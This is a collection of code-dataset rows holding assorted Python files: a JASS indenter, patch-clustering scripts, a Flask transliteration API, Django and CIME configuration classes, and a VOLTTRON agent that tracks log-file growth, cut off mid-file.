| en | 0.204884 | # --------------------------------------------------------------------------- # # Importing section # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # Functions # -----------------------------------------------------------------------------# # --------------------------------------------------------------------------- # # Main # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # Configuration file # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # Set logging object # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # Starting program # --------------------------------------------------------------------------- # # --------------------------------------------------------------------------- # # InfluxDB connection # --------------------------------------------------------------------------- # # Download files from the FTP server # Insert data into InfluxDB # Delete files correctly handled on the FTP server and close the FTP connection # Slack alert | 2.07851 | 2 |
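The importer above is driven entirely by two JSON files (the main config plus the connections file merged into it). As an illustration only, a minimal sketch of the keys the script actually reads; key names are inferred from the cfg[...] lookups in the code and the real project schema may contain more fields.
# Hypothetical minimal configuration for data_importer_ftp.py (keys inferred
# from the cfg[...] lookups above; values are placeholders, not real endpoints).
import json
cfg_sketch = {
    "connectionsFile": "conf/connections.json",
    "influxDB": {"host": "localhost", "port": 8086, "user": "user",
                 "password": "secret", "database": "oasi", "ssl": False,
                 "dataImporting": True},
    "ftp": {"enabled": True, "deleteRemoteFile": False,
            "localFolders": {"tmp": "tmp/"}},
    "alerts": {"slack": {"enabled": False}},
}
print(json.dumps(cfg_sketch, indent=2))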
autoindent_code_JASS_war3map_j.py | gil9red/SimplePyScripts | 117 | 8016 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
def merge_str_literal(text: str) -> str:
def _on_match(m: re.Match):
return m.group().replace('"+"', '')
return re.sub(r'".+?"(\+".+?")+ ', _on_match, text)
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
def merge_str_literal(text: str) -> str:
def _on_match(m: re.Match):
return m.group().replace('"+"', '')
return re.sub(r'".+?"(\+".+?")+ ', _on_match, text)
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| en | 0.31289 | #!/usr/bin/env python3 # -*- coding: utf-8 -*- function II1I1_II takes real II1I1__I returns nothing local real II1I1_1I local real st=TimerGetElapsed(II1I___I) if st<=0 then set II1I___I=CreateTimer() call TimerStart(II1I___I,1000000,false,null) endif if(II1I1__I>0)then loop set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st exitwhen II1I1_1I<=0 if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then call TriggerSleepAction(0.1*II1I1_1I) else call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL) endif endloop endif endfunction # Add empty line after endglobals and endfunction function II1I1_II takes real II1I1__I returns nothing local real II1I1_1I local real st=TimerGetElapsed(II1I___I) if st<=0 then set II1I___I=CreateTimer() call TimerStart(II1I___I,1000000,false,null) endif if(II1I1__I>0)then loop set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st exitwhen II1I1_1I<=0 if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then call TriggerSleepAction(0.1*II1I1_1I) else call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL) endif endloop endif endfunction | 2.414252 | 2 |
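The regex in merge_str_literal collapses adjacent JASS string literals joined by '+' before the indenter runs. A small standalone check of that behaviour, reusing the same pattern on a made-up input line:
import re
def merge_str_literal(text: str) -> str:
    # Drop the '"+"' junctions so '"a"+"b" ' becomes '"ab" '.
    return re.sub(r'".+?"(\+".+?")+ ', lambda m: m.group().replace('"+"', ''), text)
print(merge_str_literal('set s="Hello "+"World" call foo()'))
# -> set s="Hello World" call foo()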
python/addNewData.py | TruX-DTF/fixminer_source | 5 | 8017 | from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
def core():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
from pairs import shapePairs
matches = shapePairs()
# 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc']
matches = matches[matches.file.apply(lambda x: x in list(pattern.values()) or not ( x.startswith('linux_') or x.startswith('FFmpeg_') or x.startswith('curl_') or x.startswith('nginx_') or x.startswith('openssl_') or x.startswith('redis_') or x.startswith('tmux_') or x.startswith('vlc_')))]
from pairs import createPairs
createPairs(matches)
# # # elif job == 'importShapesPairs':
from pairs import importShape
importShape()
def checkWrongMembers():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
sizeDict = {}
for s in [(i,os.path.getsize(join(clusterPath, root, size, cluster,i))) for i in members]:
sizeDict[s[1]] = s[0]
sizeDict
if len(sizeDict) > 1:
print(join(clusterPath, root, size, cluster))
print(sizeDict.values())
def cluster():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
pairsPath = join(DATA_PATH, 'pairs')
from abstractPatch import loadPairMulti
for root in roots:
matches =loadPairMulti(root,'','shapes')
matches
sizes = matches['sizes'].unique().tolist()
for s in sizes:
match = matches[matches['sizes'] == s]
match
clusterCore(pattern,clusterPath, 'shapes', match, pairsPath, root, s, '')
def clusterCore(pattern,clusterPath, level, match, pairsPath, root, s,action ,token=''):
col_combi = match.tuples.values.tolist()
import networkx
g = networkx.Graph(col_combi)
cluster = []
for subgraph in networkx.connected_component_subgraphs(g):
logging.info('Cluster size %d',len(subgraph.nodes()))
cluster.append(subgraph.nodes())
cluster
pathMapping = dict()
if level == 'actions':
indexFile = join(pairsPath, root, s,action+'.index')
elif level == 'shapes':
indexFile = join(pairsPath, root, s + '.index')
else:
indexFile =join(pairsPath, root, s,action,token+'.index')
df = pd.read_csv(indexFile, header=None, usecols=[0, 1], index_col=[0])
pathMapping = df.to_dict()
workList = []
exportCLusters ={}
if not os.path.exists(join(clusterPath, root, s)):
print()
existingClusters = 0
else:
existingClusters = len(listdir(join(clusterPath, root, s)))
for clus in cluster:
members = [pathMapping[1][int(i)] for i in clus]
members
potentialClusters = [(key, value) for key, value in pattern.items() if key.startswith(root + '/' + s)]
potentialClusters
foundExisting = False
for pc,pcMember in potentialClusters:
if pcMember in members:
pc
foundExisting = True
exportCLusters[pc.split('/')[-1]] = members
if not foundExisting:
exportCLusters[existingClusters] = members
existingClusters= existingClusters+1
exportCLusters
for k,v in exportCLusters.items():
for f in v:
t = f, root, level, clusterPath, s, action, token, k
workList.append(t)
# for idx, clus in enumerate(cluster):
# logging.info('exporting cluster %s %s %s %d', root,s,action,idx)
# for f in clus:
# dumpFile = pathMapping[1][int(f)]
#
# t = dumpFile,root,level,clusterPath,s,action,token,idx
# workList.append(t)
from abstractPatch import dumpFilesCore
parallelRun(dumpFilesCore,workList)
# for wl in workList:
# dumpFilesCore(wl)
| from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
def core():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
from pairs import shapePairs
matches = shapePairs()
# 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc']
matches = matches[matches.file.apply(lambda x: x in list(pattern.values()) or not ( x.startswith('linux_') or x.startswith('FFmpeg_') or x.startswith('curl_') or x.startswith('nginx_') or x.startswith('openssl_') or x.startswith('redis_') or x.startswith('tmux_') or x.startswith('vlc_')))]
from pairs import createPairs
createPairs(matches)
# # # elif job == 'importShapesPairs':
from pairs import importShape
importShape()
def checkWrongMembers():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
sizeDict = {}
for s in [(i,os.path.getsize(join(clusterPath, root, size, cluster,i))) for i in members]:
sizeDict[s[1]] = s[0]
sizeDict
if len(sizeDict) > 1:
print(join(clusterPath, root, size, cluster))
print(sizeDict.values())
def cluster():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
pairsPath = join(DATA_PATH, 'pairs')
from abstractPatch import loadPairMulti
for root in roots:
matches =loadPairMulti(root,'','shapes')
matches
sizes = matches['sizes'].unique().tolist()
for s in sizes:
match = matches[matches['sizes'] == s]
match
clusterCore(pattern,clusterPath, 'shapes', match, pairsPath, root, s, '')
def clusterCore(pattern,clusterPath, level, match, pairsPath, root, s,action ,token=''):
col_combi = match.tuples.values.tolist()
import networkx
g = networkx.Graph(col_combi)
cluster = []
for subgraph in networkx.connected_component_subgraphs(g):
logging.info('Cluster size %d',len(subgraph.nodes()))
cluster.append(subgraph.nodes())
cluster
pathMapping = dict()
if level == 'actions':
indexFile = join(pairsPath, root, s,action+'.index')
elif level == 'shapes':
indexFile = join(pairsPath, root, s + '.index')
else:
indexFile =join(pairsPath, root, s,action,token+'.index')
df = pd.read_csv(indexFile, header=None, usecols=[0, 1], index_col=[0])
pathMapping = df.to_dict()
workList = []
exportCLusters ={}
if not os.path.exists(join(clusterPath, root, s)):
print()
existingClusters = 0
else:
existingClusters = len(listdir(join(clusterPath, root, s)))
for clus in cluster:
members = [pathMapping[1][int(i)] for i in clus]
members
potentialClusters = [(key, value) for key, value in pattern.items() if key.startswith(root + '/' + s)]
potentialClusters
foundExisting = False
for pc,pcMember in potentialClusters:
if pcMember in members:
pc
foundExisting = True
exportCLusters[pc.split('/')[-1]] = members
if not foundExisting:
exportCLusters[existingClusters] = members
existingClusters= existingClusters+1
exportCLusters
for k,v in exportCLusters.items():
for f in v:
t = f, root, level, clusterPath, s, action, token, k
workList.append(t)
# for idx, clus in enumerate(cluster):
# logging.info('exporting cluster %s %s %s %d', root,s,action,idx)
# for f in clus:
# dumpFile = pathMapping[1][int(f)]
#
# t = dumpFile,root,level,clusterPath,s,action,token,idx
# workList.append(t)
from abstractPatch import dumpFilesCore
parallelRun(dumpFilesCore,workList)
# for wl in workList:
# dumpFilesCore(wl)
| en | 0.474212 | # actions = listdir(join(clusterPath,root,size)) # for action in actions: # pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0] # 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc'] # # # elif job == 'importShapesPairs': # actions = listdir(join(clusterPath,root,size)) # for action in actions: # actions = listdir(join(clusterPath,root,size)) # for action in actions: # pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0] # for idx, clus in enumerate(cluster): # logging.info('exporting cluster %s %s %s %d', root,s,action,idx) # for f in clus: # dumpFile = pathMapping[1][int(f)] # # t = dumpFile,root,level,clusterPath,s,action,token,idx # workList.append(t) # for wl in workList: # dumpFilesCore(wl) | 2.115445 | 2 |
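clusterCore above groups match pairs into clusters via connected components. networkx.connected_component_subgraphs() was removed in networkx 2.4, so on current networkx the same grouping can be sketched as follows (the pairs are made up):
import networkx as nx
col_combi = [(1, 2), (2, 3), (10, 11)]  # hypothetical (fileA, fileB) match pairs
g = nx.Graph(col_combi)
clusters = [sorted(nodes) for nodes in nx.connected_components(g)]
print(clusters)  # e.g. [[1, 2, 3], [10, 11]]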
app.py | aosjehdgus/transliteration | 0 | 8018 | # -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__) # Declare the Flask object; the application package name is passed as the parameter.
app.config['JSON_AS_ASCII'] = False # Set this so Korean (Hangul) data can be sent in responses.
@app.route("/transliterate", methods=['GET'])
def transliterate():
input = request.args.get('input')
output = transliteration.run(input)
learned = transliteration.is_learned(input)
print(input, learned)
return jsonify(output)
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
| # -*- coding: utf-8 -*-
import os
import sys
import tensorflow as tf
import numpy as np
import data_utils
from translate import Transliteration
from flask import Flask, request, jsonify
transliteration = Transliteration()
app = Flask(__name__) # Declare the Flask object; the application package name is passed as the parameter.
app.config['JSON_AS_ASCII'] = False # Set this so Korean (Hangul) data can be sent in responses.
@app.route("/transliterate", methods=['GET'])
def transliterate():
input = request.args.get('input')
output = transliteration.run(input)
learned = transliteration.is_learned(input)
print(input, learned)
return jsonify(output)
if __name__ == "__main__":
app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
| ko | 1.000029 | # -*- coding: utf-8 -*- # Flask 객체 선언, 파라미터로 어플리케이션 패키지의 이름을 넣어 준다. # 한글 데이터 전송을 위해서 설정해 준다. | 2.951135 | 3 |
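A hypothetical client call against the /transliterate endpoint defined above, assuming the Flask app is running locally on port 80:
import requests
resp = requests.get("http://localhost/transliterate", params={"input": "seoul"})
print(resp.json())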
pyano2/apps.py | mental689/pyano | 1 | 8019 | from django.apps import AppConfig
class Pyano2Config(AppConfig):
name = 'pyano2'
| from django.apps import AppConfig
class Pyano2Config(AppConfig):
name = 'pyano2'
| none | 1 | 1.257219 | 1 |
|
cime/scripts/lib/CIME/XML/env_build.py | cbeall123/E3SM | 1 | 8020 | <reponame>cbeall123/E3SM
"""
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
class EnvBuild(EnvBase):
# pylint: disable=unused-argument
def __init__(self, case_root=None, infile="env_build.xml",components=None):
"""
initialize an object interface to file env_build.xml in the case directory
"""
schema = os.path.join(get_cime_root(), "config", "xml_schemas", "env_entry_id.xsd")
EnvBase.__init__(self, case_root, infile, schema=schema)
| """
Interface to the env_build.xml file. This class inherits from EnvBase
"""
from CIME.XML.standard_module_setup import *
from CIME.XML.env_base import EnvBase
logger = logging.getLogger(__name__)
class EnvBuild(EnvBase):
# pylint: disable=unused-argument
def __init__(self, case_root=None, infile="env_build.xml",components=None):
"""
initialize an object interface to file env_build.xml in the case directory
"""
schema = os.path.join(get_cime_root(), "config", "xml_schemas", "env_entry_id.xsd")
EnvBase.__init__(self, case_root, infile, schema=schema) | en | 0.641463 | Interface to the env_build.xml file. This class inherits from EnvBase # pylint: disable=unused-argument initialize an object interface to file env_build.xml in the case directory | 2.144277 | 2 |
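Minimal instantiation sketch, assuming CIME is on the Python path and case_root points at an existing case directory that already contains env_build.xml:
from CIME.XML.env_build import EnvBuild
env_build = EnvBuild(case_root="/path/to/case")  # hypothetical case directory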
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py | gnmerritt/volttron | 1 | 8021 | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
LogStatisticsAgent reads the volttron.log file size every hour,
computes the size delta from the previous hour and publishes the difference
with a timestamp. It also publishes the standard deviation every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
Publishes the file's size increment over the previous time interval (60 minutes)
with a timestamp.
Also publishes the standard deviation of the file's hourly size differences
every 24 hours.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers = headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic,
message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(
seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(
next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
LogStatisticsAgent reads the volttron.log file size every hour,
computes the size delta from the previous hour and publishes the difference
with a timestamp. It also publishes the standard deviation every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
Publishes the file's size increment over the previous time interval (60 minutes)
with a timestamp.
Also publishes the standard deviation of the file's hourly size differences
every 24 hours.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers = headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic,
message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(
